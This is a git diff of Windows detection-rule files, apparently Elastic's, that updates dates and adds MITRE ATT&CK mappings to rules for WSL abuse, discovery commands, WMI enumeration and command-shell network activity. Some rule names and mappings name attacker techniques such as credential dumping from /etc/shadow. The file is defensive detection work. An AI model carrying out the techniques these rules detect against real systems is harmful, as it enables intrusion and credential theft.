+[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_workfolders_control_execution.toml b/rules/windows/defense_evasion_workfolders_control_execution.toml index dd3fab8da24..61fdcc336fe 100644 --- a/rules/windows/defense_evasion_workfolders_control_execution.toml +++ b/rules/windows/defense_evasion_workfolders_control_execution.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/02" integration = ["windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -95,14 +95,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.008" +name = "Path Interception by Search Order Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index f0dae674a7e..42ba25c6386 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,31 +103,49 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_wsl_child_process.toml b/rules/windows/defense_evasion_wsl_child_process.toml index 54afa15164c..96f71cd4e3f 100644 --- a/rules/windows/defense_evasion_wsl_child_process.toml +++ b/rules/windows/defense_evasion_wsl_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,14 +119,31 @@ process where host.os.type == "windows" and event.type : "start" and process.com [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 3fbc2682614..9d48751dc63 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,18 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_filesystem.toml b/rules/windows/defense_evasion_wsl_filesystem.toml index 6ec6a72e996..44f6745bb9c 100644 --- a/rules/windows/defense_evasion_wsl_filesystem.toml +++ b/rules/windows/defense_evasion_wsl_filesystem.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,14 +88,31 @@ sequence by process.entity_id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 1d34d559fbf..d8753675b61 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index ca02fcc756a..2e219f30e67 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,6 +90,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -100,9 +101,25 @@ id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml index 56600c5238b..9d12b1b6952 100644 --- a/rules/windows/discovery_active_directory_webservice.toml +++ b/rules/windows/discovery_active_directory_webservice.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,33 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 03d5ecdf531..bee03e2901a 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,31 +96,36 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml index ba1b6f16be2..53ce1bbbceb 100644 --- a/rules/windows/discovery_high_number_ad_properties.toml +++ b/rules/windows/discovery_high_number_ad_properties.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,14 +85,33 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" + +[[rule.threat.technique]] +id = "T1482" +name = "Domain Trust Discovery" +reference = "https://attack.mitre.org/techniques/T1482/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml index 70ce393aac1..3382a113142 100644 --- a/rules/windows/discovery_host_public_ip_address_lookup.toml +++ b/rules/windows/discovery_host_public_ip_address_lookup.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,30 +131,35 @@ network where host.os.type == "windows" and dns.question.name != null and proces [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index 4fa1272e100..01b324a4b1d 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -165,76 +165,107 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" +[[rule.threat.technique]] +id = "T1201" +name = "Password Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1201/" + [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1039" name = "Data from Network Shared Drive" reference = "https://attack.mitre.org/techniques/T1039/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 0c166da5fd0..80a9d2adbd9 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,14 +117,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index c7deeed356b..93381464838 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,19 +105,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index 764af8ffaf6..9f5a04ad732 100644 --- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,29 +134,39 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 6424adbe5c9..46e6569f805 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -132,17 +132,26 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml index c728a7ba058..edc62287465 100644 --- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml +++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,28 +103,50 @@ sequence by process.parent.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1216" name = "System Script Proxy Execution" @@ -134,6 +156,7 @@ reference = "https://attack.mitre.org/techniques/T1216/" id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.003" name = "CMSTP" @@ -164,7 +187,6 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" @@ -174,15 +196,13 @@ reference = "https://attack.mitre.org/techniques/T1220/" id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" + [[rule.threat.technique.subtechnique]] id = "T1497.003" name = "Time Based Checks" reference = "https://attack.mitre.org/techniques/T1497/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index 1e01769894a..27e5073ecae 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,22 +72,30 @@ URL shortcut files, typically used for quick access to web resources, can be exp [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -98,10 +106,7 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml index 15f89225424..5b7c76345e6 100644 --- a/rules/windows/execution_enumeration_via_wmiprvse.toml +++ b/rules/windows/execution_enumeration_via_wmiprvse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,38 +99,65 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1007" +name = "System Service Discovery" +reference = "https://attack.mitre.org/techniques/T1007/" + +[[rule.threat.technique]] +id = "T1012" +name = "Query Registry" +reference = "https://attack.mitre.org/techniques/T1012/" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" @@ -141,9 +168,12 @@ id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" +[[rule.threat.technique]] +id = "T1615" +name = "Group Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1615/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index 2b11f8ec924..51e7dee4439 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -236,36 +236,76 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + 